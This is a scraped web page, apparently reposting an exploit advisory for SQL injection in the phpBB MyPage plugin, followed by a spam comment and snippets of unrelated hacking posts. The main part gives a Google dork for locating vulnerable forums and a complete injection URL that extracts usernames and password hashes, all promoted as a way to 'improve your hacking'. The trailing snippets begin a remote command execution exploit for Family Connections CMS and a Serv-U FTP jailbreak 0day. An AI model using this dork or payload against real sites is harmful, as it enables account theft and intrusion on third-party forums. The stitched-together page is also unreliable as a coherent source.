MyPage plugin (phpBB) SQL Injection (All versions)

==================================================== MyPage plugin (phpBB) SQL Injection (All versions) ==================================================== ==================================================== Improve your hacking knowledges ! ==================================================== ==================================================== VISIT http://HackSociety.net ! ==================================================== # Exploit Title: SQL Injection on the plugin phpBB plugin MyPage # Google Dork: inurl:"mypage.php?id=" # Date: 06/12/2011 # Author: CrazyMouse (from HackSociety.net) # Version: 0.2.3 (this is the last avaliable version, older versions are also vulnerable) # Tested on: Windows 7 x64 (Firefox) ==================================================== VISIT http://HackSociety.net ! ==================================================== [~] Exploit:         http://localhost/forum/ [~]     http://localhost/forum/mypage.php?id= (SQL) [~] Example:     http://server/forum/mypage.php?id=1%27+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Cphpbb_users.user_id%2C0x5e%2Cphpbb_users.user_type%2C0x5e%2Cphpbb_users.group_id%2C0x5e%2Cphpbb_users.username%2C0x5e%2Cphpbb_users.user_password%2C0x27%2C0x7e%29+from+%60forum_domperm%60.phpbb_users+limit+5%2C1%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+%271%27%3D%271 ==================================================== # Thanks to Crassus ==================================================== ==================================================== VISIT http://HackSociety.net ! ==================================================== 留言评论(旧系统): 【匿名者】 @ 2012-09-08 02:23:56 You put the lime in the coconut and drink the arctile up. 本站回复: [暂无回复

XSS两三事(第一季) By:sH

XSS两三事(第一季) Author:ShadowHider Email:s@xeye.us 这几天发现论坛里讨论XSS的帖子多了起来,刚好我以前也折腾过一阵子XSS,就斗胆来和大家交流分享下。 下面分享几个不

xss的发现与利用

t00ls最近要暴走大清理哇,不幸名单在列,发个文章保住ID先。 恩,xss老生常谈了xss的发现也是有一些技巧的,这里介绍一种。 很多人习惯是

渗透fdyz

很久以前写的了! 首先说下为什么要渗透这个站,在浏览CNBeta的时候看到了一篇文章,附上文章地址! http://www.cnbeta.com/articles/131702.htm 文章里所说,网站主要是百度造成的,而我并

Family connections CMS v2.5.0-v2.7.1 远程命令执行漏洞

Family connections CMS v2.5.0-v2.7.1 远程命令执行漏洞,Family Connections CMS v2.5.0-v2.7.1 (less.php) Remote Command Execution,Family connections CMS v2.5.0-v2.7.1 remote command execution exploit。 <?php /* Family connections CMS v2.5.0-v2.7.1 remote command execution exploit vendor_________: https://www.familycms.com/ software link__: https://www.familycms.com/download.php

Serv-U FTP Server Jail Break 0day - Serv-U 目录跳转漏洞

I m better than TESO! CONFIDENTIAL SOURCE MATERIALS!   [*]----------------------------------------------------[*]   Serv-U FTP Server Jail Break 0day   Discovered By Kingcope   Year 2011 [*]----------------------------------------------------[*]   Affected: 220 Serv-U FTP Server v7.3 ready... 220 Serv-U FTP Server v7.1 ready... 220 Serv-U FTP Server v6.4 ready... 220 Serv-U FTP Server v8.2 ready... 220 Serv-U FTP Server v10.5 ready...   [*]----------------------------------------------------[*] C:\Users\kingcope\Desktop>ftp 192.168.133.134 Verbindung mit 192.168.133.134 wurde hergestellt. 220 Serv-U FTP Server